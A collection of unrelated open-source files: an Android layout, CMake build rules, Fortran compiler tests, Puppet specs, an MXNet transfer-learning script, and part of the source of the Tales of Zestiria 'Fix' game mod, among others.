17,11,22,15,14,10,23,1,11,2,4,11,5,9,1,13,9,1
22,17,17,16,10,15,13,1,7,2,3,14,9,9,2,12,6,2
21,18,18,15,11,15,16,1,7,2,3,14,6,8,2,12,7,2
20,9,16,15,16,6,19,1,7,3,4,14,4,11,1,16,11,3
22,10,17,18,13,6,21,1,8,3,4,13,4,11,1,15,10,3
17,13,14,16,4,9,14,1,13,0,11,13,5,7,1,4,11,5
12,11,9,12,6,5,12,1,9,1,7,12,5,6,0,4,8,2
18,
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:id="@+id/container"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".MainActivity" />
|
{
"pile_set_name": "Github"
}
| null | null |
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .data import DataIngestion
__all__ = ['DataIngestion']
|
{
"pile_set_name": "Github"
}
| null | null |
# Copyright (C) 2006-2020 Istituto Italiano di Tecnologia (IIT)
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD-3-Clause license. See the accompanying LICENSE file for details.
# FIXME All API should use a YARP_manager_API for __declspec(dllimport/dllexport)
# For now always build the library as STATIC
add_library(YARP_manager STATIC)
add_library(YARP::YARP_manager ALIAS YARP_manager)
set(YARP_manager_HDRS yarp/manager/application.h
yarp/manager/arbitrator.h
yarp/manager/binexparser.h
yarp/manager/broker.h
yarp/manager/data.h
yarp/manager/execstate.h
yarp/manager/executable.h
yarp/manager/fsm.h
yarp/manager/graph.h
yarp/manager/kbase.h
yarp/manager/localbroker.h
yarp/manager/logicresource.h
yarp/manager/manager.h
yarp/manager/manifestloader.h
yarp/manager/module.h
yarp/manager/node.h
yarp/manager/physicresource.h
yarp/manager/primresource.h
yarp/manager/resource.h
yarp/manager/scriptbroker.h
yarp/manager/singleapploader.h
yarp/manager/utility.h
yarp/manager/xmlapploader.h
yarp/manager/xmlclusterloader.h
yarp/manager/xmlappsaver.h
yarp/manager/xmlmodloader.h
yarp/manager/xmlresloader.h
yarp/manager/xmltemploader.h
yarp/manager/yarpbroker.h
yarp/manager/yarpdevbroker.h
yarp/manager/ymm-types.h)
set(YARP_manager_IMPL_HDRS yarp/manager/impl/textparser.h)
set(YARP_manager_SRCS yarp/manager/application.cpp
yarp/manager/arbitrator.cpp
yarp/manager/binexparser.cpp
yarp/manager/broker.cpp
yarp/manager/data.cpp
yarp/manager/execstate.cpp
yarp/manager/executable.cpp
yarp/manager/graph.cpp
yarp/manager/kbase.cpp
yarp/manager/localbroker.cpp
yarp/manager/logicresource.cpp
yarp/manager/manager.cpp
yarp/manager/module.cpp
yarp/manager/node.cpp
yarp/manager/physicresource.cpp
yarp/manager/primresource.cpp
yarp/manager/resource.cpp
yarp/manager/scriptbroker.cpp
yarp/manager/singleapploader.cpp
yarp/manager/utility.cpp
yarp/manager/xmlapploader.cpp
yarp/manager/xmlclusterloader.cpp
yarp/manager/xmlappsaver.cpp
yarp/manager/xmlmodloader.cpp
yarp/manager/xmlresloader.cpp
yarp/manager/xmltemploader.cpp
yarp/manager/yarpbroker.cpp)
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Source Files"
FILES ${YARP_manager_SRCS})
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Header Files"
FILES ${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_sources(YARP_manager PRIVATE ${YARP_manager_SRCS}
${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_include_directories(YARP_manager PUBLIC $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}>
$<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)
if(MSVC)
target_include_directories(YARP_manager SYSTEM PRIVATE ${dirent_INCLUDE_DIRS})
endif()
target_compile_features(YARP_manager PUBLIC cxx_std_14)
target_link_libraries(YARP_manager PUBLIC YARP::YARP_os
PRIVATE YARP::YARP_sig)
list(APPEND YARP_manager_PUBLIC_DEPS YARP_os)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_sig)
if(TARGET YARP::YARP_math)
target_link_libraries(YARP_manager PRIVATE YARP::YARP_math)
target_compile_definitions(YARP_manager PRIVATE WITH_YARPMATH)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_math)
endif()
target_include_directories(YARP_manager SYSTEM PRIVATE ${TinyXML_INCLUDE_DIRS})
target_link_libraries(YARP_manager PRIVATE ${TinyXML_LIBRARIES})
list(APPEND YARP_manager_PRIVATE_DEPS TinyXML)
set_property(TARGET YARP_manager PROPERTY PUBLIC_HEADER ${YARP_manager_HDRS})
set_property(TARGET YARP_manager PROPERTY PRIVATE_HEADER ${YARP_manager_IMPL_HDRS})
set_property(TARGET YARP_manager PROPERTY VERSION ${YARP_VERSION_SHORT})
set_property(TARGET YARP_manager PROPERTY SOVERSION ${YARP_SOVERSION})
set_property(TARGET YARP_manager PROPERTY FOLDER "Libraries/Private")
install(TARGETS YARP_manager
EXPORT YARP_manager
RUNTIME
DESTINATION "${CMAKE_INSTALL_BINDIR}"
COMPONENT YARP_manager
LIBRARY
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager
NAMELINK_COMPONENT YARP_manager-dev
ARCHIVE
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager-dev
PUBLIC_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager"
COMPONENT YARP_manager-dev
PRIVATE_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager/impl"
COMPONENT YARP_manager-priv-dev)
set(YARP_manager_PUBLIC_DEPS ${YARP_manager_PUBLIC_DEPS} PARENT_SCOPE)
set(YARP_manager_PRIVATE_DEPS ${YARP_manager_PRIVATE_DEPS} PARENT_SCOPE)
|
{
"pile_set_name": "Github"
}
| null | null |
using System;
using Waher.Security;
namespace Waher.Networking.CoAP.Options
{
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public abstract class CoapOptionOpaque : CoapOption
{
private byte[] value;
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public CoapOptionOpaque()
: base()
{
}
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
/// <param name="Value">Opaque option value.</param>
public CoapOptionOpaque(byte[] Value)
{
this.value = Value;
}
/// <summary>
/// Gets the option value.
/// </summary>
/// <returns>Binary value. Can be null, if option does not have a value.</returns>
public override byte[] GetValue()
{
return this.value;
}
/// <summary>
/// <see cref="object.ToString()"/>
/// </summary>
public override string ToString()
{
return base.ToString() + " = " + Hashes.BinaryToString(this.value);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
! RUN: %S/test_errors.sh %s %t %f18
! Extended derived types
module m1
type :: t1
integer :: x
!ERROR: Component 'x' is already declared in this derived type
real :: x
end type
end
module m2
type :: t1
integer :: i
end type
type, extends(t1) :: t2
!ERROR: Component 'i' is already declared in a parent of this derived type
integer :: i
end type
end
module m3
type :: t1
end type
type, extends(t1) :: t2
integer :: i
!ERROR: 't1' is a parent type of this type and so cannot be a component
real :: t1
end type
type :: t3
end type
type, extends(t3) :: t4
end type
type, extends(t4) :: t5
!ERROR: 't3' is a parent type of this type and so cannot be a component
real :: t3
end type
end
module m4
type :: t1
integer :: t1
end type
!ERROR: Type cannot be extended as it has a component named 't1'
type, extends(t1) :: t2
end type
end
module m5
type :: t1
integer :: t2
end type
type, extends(t1) :: t2
end type
!ERROR: Type cannot be extended as it has a component named 't2'
type, extends(t2) :: t3
end type
end
module m6
! t1 can be extended if it is known as anything but t3
type :: t1
integer :: t3
end type
type, extends(t1) :: t2
end type
end
subroutine s6
use :: m6, only: t3 => t1
!ERROR: Type cannot be extended as it has a component named 't3'
type, extends(t3) :: t4
end type
end
subroutine r6
use :: m6, only: t5 => t1
type, extends(t5) :: t6
end type
end
module m7
type, private :: t1
integer :: i1
end type
type, extends(t1) :: t2
integer :: i2
integer, private :: i3
end type
end
subroutine s7
use m7
type(t2) :: x
integer :: j
j = x%i2
!ERROR: PRIVATE component 'i3' is only accessible within module 'm7'
j = x%i3
!ERROR: PRIVATE component 't1' is only accessible within module 'm7'
j = x%t1%i1
end
! 7.5.4.8(2)
module m8
type :: t
integer :: i1
integer, private :: i2
end type
type(t) :: y
integer :: a(1)
contains
subroutine s0
type(t) :: x
x = t(i1=2, i2=5) !OK
end
subroutine s1
a = [y%i2] !OK
end subroutine
end
subroutine s8
use m8
type(t) :: x
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(2, 5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(i1=2, i2=5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
a = [y%i2]
end
! 7.5.4.8(2)
module m9
interface
module subroutine s()
end subroutine
end interface
type :: t
integer :: i1
integer, private :: i2
end type
end
submodule(m9) sm8
contains
module subroutine s
type(t) :: x
x = t(i1=2, i2=5) !OK
end
end
|
{
"pile_set_name": "Github"
}
| null | null |
require 'puppet'
require 'tempfile'
describe Puppet::Type.type(:file_line) do
let :file_line do
Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'line', :path => '/tmp/path')
end
it 'should accept a line and path' do
file_line[:line] = 'my_line'
file_line[:line].should == 'my_line'
file_line[:path] = '/my/path'
file_line[:path].should == '/my/path'
end
it 'should accept a match regex' do
file_line[:match] = '^foo.*$'
file_line[:match].should == '^foo.*$'
end
it 'should not accept a match regex that does not match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^bar=blah$'
)}.to raise_error(Puppet::Error, /the value must be a regex that matches/)
end
it 'should accept a match regex that does match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^\s*foo=.*$'
)}.not_to raise_error
end
it 'should accept posix filenames' do
file_line[:path] = '/tmp/path'
file_line[:path].should == '/tmp/path'
end
it 'should not accept unqualified path' do
expect { file_line[:path] = 'file' }.should raise_error(Puppet::Error, /File paths must be fully qualified/)
end
it 'should require that a line is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :path => '/tmp/file') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should require that a file is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'path') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should default to ensure => present' do
file_line[:ensure].should eq :present
end
it "should autorequire the file it manages" do
catalog = Puppet::Resource::Catalog.new
file = Puppet::Type.type(:file).new(:name => "/tmp/path")
catalog.add_resource file
catalog.add_resource file_line
relationship = file_line.autorequire.find do |rel|
(rel.source.to_s == "File[/tmp/path]") and (rel.target.to_s == file_line.to_s)
end
relationship.should be_a Puppet::Relationship
end
it "should not autorequire the file it manages if it is not managed" do
catalog = Puppet::Resource::Catalog.new
catalog.add_resource file_line
file_line.autorequire.should be_empty
end
end
|
{
"pile_set_name": "Github"
}
| null | null |
import { createElement as h } from 'react'
import { AppRegistry } from 'react-native'
import { BrowserRouter } from 'react-router-dom'
import { APP_ID, DATA_KEY } from '@roguejs/app/constants'
import App from './App'
AppRegistry.registerComponent('App', () => {
return props => h(BrowserRouter, {}, h(App, props))
})
AppRegistry.runApplication('App', {
initialProps: typeof window !== undefined ? window[DATA_KEY] : {},
rootTag: document.getElementById(APP_ID),
})
// https://github.com/alidcastano/rogue.js/issues/78
// import hydrate from'@roguejs/app/client.native'
// import App from './App'
// hydrate(App)
if (module.hot) {
module.hot.accept()
}
|
{
"pile_set_name": "Github"
}
| null | null |
org.apache.commons.math3.distribution.HypergeometricDistribution
|
{
"pile_set_name": "Github"
}
| null | null |
<?php
class HTMLPurifier_AttrDef_TextTest extends HTMLPurifier_AttrDefHarness
{
public function test()
{
$this->def = new HTMLPurifier_AttrDef_Text();
$this->assertDef('This is spiffy text!');
$this->assertDef(" Casual\tCDATA parse\ncheck. ", 'Casual CDATA parse check.');
}
}
// vim: et sw=4 sts=4
|
{
"pile_set_name": "Github"
}
| null | null |
//
// UIControl+ActionBlocks.m
// iOS-Categories (https://github.com/shaojiankui/iOS-Categories)
//
// Created by Jakey on 15/5/23.
// Copyright (c) 2015年 www.skyfox.org. All rights reserved.
//
#import "UIControl+ActionBlocks.h"
#import <objc/runtime.h>
static const void *UIControlActionBlockArray = &UIControlActionBlockArray;
@implementation UIControlActionBlockWrapper
- (void)invokeBlock:(id)sender {
if (self.actionBlock) {
self.actionBlock(sender);
}
}
@end
@implementation UIControl (ActionBlocks)
-(void)handleControlEvents:(UIControlEvents)controlEvents withBlock:(UIControlActionBlock)actionBlock {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
UIControlActionBlockWrapper *blockActionWrapper = [[UIControlActionBlockWrapper alloc] init];
blockActionWrapper.actionBlock = actionBlock;
blockActionWrapper.controlEvents = controlEvents;
[actionBlocksArray addObject:blockActionWrapper];
[self addTarget:blockActionWrapper action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
- (void)removeActionBlocksForControlEvents:(UIControlEvents)controlEvents {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
NSMutableArray *wrappersToRemove = [NSMutableArray arrayWithCapacity:[actionBlocksArray count]];
[actionBlocksArray enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
UIControlActionBlockWrapper *wrapperTmp = obj;
if (wrapperTmp.controlEvents == controlEvents) {
[wrappersToRemove addObject:wrapperTmp];
[self removeTarget:wrapperTmp action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
}];
[actionBlocksArray removeObjectsInArray:wrappersToRemove];
}
- (NSMutableArray *)actionBlocksArray {
NSMutableArray *actionBlocksArray = objc_getAssociatedObject(self, UIControlActionBlockArray);
if (!actionBlocksArray) {
actionBlocksArray = [NSMutableArray array];
objc_setAssociatedObject(self, UIControlActionBlockArray, actionBlocksArray, OBJC_ASSOCIATION_RETAIN);
}
return actionBlocksArray;
}
@end
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* <<
* Davinci
* ==
* Copyright (C) 2016 - 2019 EDP
* ==
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* >>
*
*/
package edp.davinci.service;
import edp.core.exception.NotFoundException;
import edp.core.exception.ServerException;
import edp.core.exception.UnAuthorizedExecption;
import edp.davinci.core.service.CheckEntityService;
import edp.davinci.dto.displayDto.*;
import edp.davinci.dto.roleDto.VizVisibility;
import edp.davinci.model.DisplaySlide;
import edp.davinci.model.MemDisplaySlideWidget;
import edp.davinci.model.Role;
import edp.davinci.model.User;
import org.springframework.web.multipart.MultipartFile;
import java.util.List;
public interface DisplaySlideService extends CheckEntityService {
DisplayWithSlides getDisplaySlideList(Long displayId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
SlideWithMem getDisplaySlideMem(Long displayId, Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
DisplaySlide createDisplaySlide(DisplaySlideCreate displaySlideCreate, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateDisplaySildes(Long displayId, DisplaySlide[] displaySlides, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlide(Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<MemDisplaySlideWidget> addMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetCreate[] slideWidgetCreates, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidget(MemDisplaySlideWidget memDisplaySlideWidget, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteMemDisplaySlideWidget(Long relationId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlideWidgetList(Long displayId, Long slideId, Long[] memIds, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetDto[] memDisplaySlideWidgets, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideBGImage(Long slideId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideSubWidgetBGImage(Long relationId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<Long> getSlideExecludeRoles(Long id);
boolean postSlideVisibility(Role role, VizVisibility vizVisibility, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean copySlides(Long originDisplayId, Long displayId, User user);
}
|
{
"pile_set_name": "Github"
}
| null | null |
import mxnet as mx
import numpy as np
import os, time, logging, argparse, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
import gluoncv as gcv
gcv.utils.check_version('0.6.0')
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
def parse_opts():
parser = argparse.ArgumentParser(description='Transfer learning on MINC-2500 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data', type=str, default='',
help='directory for the prepared data folder')
parser.add_argument('--model', required=True, type=str,
help='name of the pretrained model from model zoo.')
parser.add_argument('-j', '--workers', dest='num_workers', default=4, type=int,
help='number of preprocessing workers')
parser.add_argument('--num-gpus', default=0, type=int,
help='number of gpus to use, 0 indicates cpu only')
parser.add_argument('--epochs', default=40, type=int,
help='number of training epochs')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.001, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float,
help='momentum')
parser.add_argument('--weight-decay', '--wd', dest='wd', default=1e-4, type=float,
help='weight decay (default: 1e-4)')
parser.add_argument('--lr-factor', default=0.75, type=float,
help='learning rate decay ratio')
parser.add_argument('--lr-steps', default='10,20,30', type=str,
help='list of learning rate decay epochs as in str')
opts = parser.parse_args()
return opts
# Preparation
opts = parse_opts()
classes = 23
model_name = opts.model
epochs = opts.epochs
lr = opts.lr
batch_size = opts.batch_size
momentum = opts.momentum
wd = opts.wd
lr_factor = opts.lr_factor
lr_steps = [int(s) for s in opts.lr_steps.split(',')] + [np.inf]
num_gpus = opts.num_gpus
num_workers = opts.num_workers
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = batch_size * max(num_gpus, 1)
logging.basicConfig(level=logging.INFO,
handlers = [logging.StreamHandler()])
train_path = os.path.join(opts.data, 'train')
val_path = os.path.join(opts.data, 'val')
test_path = os.path.join(opts.data, 'test')
jitter_param = 0.4
lighting_param = 0.1
normalize = transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(480),
transforms.RandomResizedCrop(224),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
transforms.RandomLighting(lighting_param),
transforms.ToTensor(),
normalize
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
def test(net, val_data, ctx):
metric = mx.metric.Accuracy()
for i, batch in enumerate(val_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
outputs = [net(X) for X in data]
metric.update(label, outputs)
return metric.get()
def train(train_path, val_path, test_path):
# Initialize the net with pretrained model
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
finetune_net.output = nn.Dense(classes)
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
# Define DataLoader
train_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(train_path).transform_first(transform_train),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(val_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(test_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
# Define Trainer
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
lr_counter = 0
num_batch = len(train_data)
# Start Training
for epoch in range(epochs):
if epoch == lr_steps[lr_counter]:
trainer.set_learning_rate(trainer.learning_rate*lr_factor)
lr_counter += 1
tic = time.time()
train_loss = 0
metric.reset()
for i, batch in enumerate(train_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
with ag.record():
outputs = [finetune_net(X) for X in data]
loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
for l in loss:
l.backward()
trainer.step(batch_size)
train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
metric.update(label, outputs)
_, train_acc = metric.get()
train_loss /= num_batch
_, val_acc = test(finetune_net, val_data, ctx)
logging.info('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
(epoch, train_acc, train_loss, val_acc, time.time() - tic))
_, test_acc = test(finetune_net, test_data, ctx)
logging.info('[Finished] Test-acc: %.3f' % (test_acc))
if __name__ == "__main__":
train(train_path, val_path, test_path)
|
{
"pile_set_name": "Github"
}
| null | null |
{
"created_at": "2015-02-27T22:27:51.555394",
"description": "Simple 1-room web chat",
"fork": false,
"full_name": "rick446/Chatterbox",
"language": "Python",
"updated_at": "2015-02-27T23:41:55.318953"
}
|
{
"pile_set_name": "Github"
}
| null | null |
people = [{first_name = "Bruce", last_name = "Springsteen"},
{first_name = "Eric", last_name = "Clapton"},
{first_name = "Bob", last_name = "Seger"}]
|
{
"pile_set_name": "Github"
}
| null | null |
// TR1 cfloat -*- C++ -*-
// Copyright (C) 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 2, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this library; see the file COPYING. If not, write to the Free
// Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
// USA.
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
/** @file tr1/cfloat
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_CFLOAT
#define _TR1_CFLOAT 1
#include <cfloat>
#ifndef DECIMAL_DIG
#define DECIMAL_DIG __DECIMAL_DIG__
#endif
#ifndef FLT_EVAL_METHOD
#define FLT_EVAL_METHOD __FLT_EVAL_METHOD__
#endif
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* This file is part of Tales of Zestiria "Fix".
*
* Tales of Zestiria "Fix" is free software : you can redistribute it
* and/or modify it under the terms of the GNU General Public License
* as published by The Free Software Foundation, either version 3 of
* the License, or (at your option) any later version.
*
* Tales of Zestiria "Fix" is distributed in the hope that it will be
* useful,
*
* But WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Tales of Zestiria "Fix".
*
* If not, see <http://www.gnu.org/licenses/>.
*
**/
#include <Windows.h>
#include "config.h"
#include "log.h"
#include "sound.h"
#include "framerate.h"
#include "general_io.h"
#include "keyboard.h"
#include "steam.h"
#include "render.h"
#include "scanner.h"
#include "command.h"
#include "hook.h"
#include <process.h>
#pragma comment (lib, "kernel32.lib")
HMODULE hDLLMod = { 0 }; // Handle to SELF
HMODULE hInjectorDLL = { 0 }; // Handle to Special K
typedef HRESULT (__stdcall *SK_UpdateSoftware_pfn)(const wchar_t* wszProduct);
typedef bool (__stdcall *SK_FetchVersionInfo_pfn)(const wchar_t* wszProduct);
std::wstring injector_dll;
typedef void (__stdcall *SKX_SetPluginName_pfn)(std::wstring name);
SKX_SetPluginName_pfn SKX_SetPluginName = nullptr;
unsigned int
WINAPI
DllThread (LPVOID user)
{
std::wstring plugin_name = L"Tales of Zestiria \"Fix\" v " + TZF_VER_STR;
dll_log = TZF_CreateLog (L"logs/tzfix.log");
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" ); // <--- I was bored ;)
dll_log->Log ( L"tzfix.dll Plug-In\n"
L"=========== (Version: v %s) "
L"===========",
TZF_VER_STR.c_str () );
DWORD speedresetcode_addr = 0x0046C0F9; //0x0046C529;
DWORD speedresetcode2_addr = 0x0056EB41; //0x0056E441; 0x217B464
DWORD speedresetcode3_addr = 0x0056E03E; //0x0056D93F;
DWORD limiter_branch_addr = 0x00990F53; //0x00990873;
DWORD aspect_addr = 0x00D52388; //0x00D52398;
DWORD fovy_addr = 0x00D5238C; //0x00D5239C;
if (! TZF_LoadConfig ()) {
config.audio.channels = 8;
config.audio.sample_hz = 48000;
config.audio.compatibility = false;
config.audio.enable_fix = true;
config.framerate.allow_fake_sleep = false;
config.framerate.yield_processor = true;
config.framerate.minimize_latency = false;
config.framerate.speedresetcode_addr = 0x0046C0F9;
config.framerate.speedresetcode2_addr = 0x0056EB41;
config.framerate.speedresetcode3_addr = 0x0056E03E;
config.framerate.limiter_branch_addr = 0x00990873;
config.framerate.disable_limiter = true;
config.framerate.auto_adjust = false;
config.framerate.target = 60;
config.framerate.battle_target = 60;
config.framerate.battle_adaptive = false;
config.framerate.cutscene_target = 30;
config.file_io.capture = false;
config.steam.allow_broadcasts = false;
config.lua.fix_priest = true;
config.render.aspect_ratio = 1.777778f;
config.render.fovy = 0.785398f;
config.render.aspect_addr = 0x00D56494;
config.render.fovy_addr = 0x00D56498;
config.render.blackbar_videos = true;
config.render.aspect_correction = true;
config.render.postproc_ratio = 1.0f;
config.render.shadow_rescale = -2;
config.render.env_shadow_rescale = 0;
config.render.clear_blackbars = true;
config.textures.remaster = true;
config.textures.dump = false;
config.textures.cache = true;
config.textures.gamepad = L"Xbox360";
config.system.injector = injector_dll;
// Save a new config if none exists
TZF_SaveConfig ();
}
config.system.injector = injector_dll;
SKX_SetPluginName =
(SKX_SetPluginName_pfn)
GetProcAddress (hInjectorDLL, "SKX_SetPluginName");
SK_GetCommandProcessor =
(SK_GetCommandProcessor_pfn)
GetProcAddress (hInjectorDLL, "SK_GetCommandProcessor");
//
// If this is NULL, the injector system isn't working right!!!
//
if (SKX_SetPluginName != nullptr)
SKX_SetPluginName (plugin_name.c_str ());
// Locate the gamestate address; having this as the first thing in the log
// file is tremendously handy in identifying which client version a user
// is running.
{
uint8_t sig [] = { 0x74, 0x42, 0xB1, 0x01, 0x38, 0x1D };
uintptr_t addr = (uintptr_t)TZF_Scan (sig, 6);
if (addr != NULL) {
game_state.base_addr = (BYTE *)(*(DWORD *)(addr + 6) - 0x13);
dll_log->Log (L"[ Sig Scan ] Scanned Gamestate Address: %06Xh", game_state.base_addr);
}
}
if (TZF_Init_MinHook () == MH_OK) {
extern void TZFix_ImGui_Init (void);
TZFix_ImGui_Init ();
CoInitializeEx (nullptr, COINIT_MULTITHREADED);
tzf::SoundFix::Init ();
tzf::FileIO::Init ();
tzf::SteamFix::Init ();
tzf::RenderFix::Init ();
tzf::FrameRateFix::Init ();
tzf::KeyboardFix::Init ();
TZF_ApplyQueuedHooks ();
// Uncomment this when spawning a thread
//CoUninitialize ();
}
SK_UpdateSoftware_pfn SK_UpdateSoftware =
(SK_UpdateSoftware_pfn)
GetProcAddress ( hInjectorDLL,
"SK_UpdateSoftware" );
SK_FetchVersionInfo_pfn SK_FetchVersionInfo =
(SK_FetchVersionInfo_pfn)
GetProcAddress ( hInjectorDLL,
"SK_FetchVersionInfo" );
if (! wcsstr (injector_dll.c_str (), L"SpecialK")) {
if ( SK_FetchVersionInfo != nullptr &&
SK_UpdateSoftware != nullptr ) {
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2013-2018 yvolk (Yuri Volkov), http://yurivolkov.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.andstatus.app.timeline.meta;
import android.content.Context;
import androidx.annotation.NonNull;
import androidx.annotation.StringRes;
import org.andstatus.app.R;
import org.andstatus.app.lang.SelectableEnum;
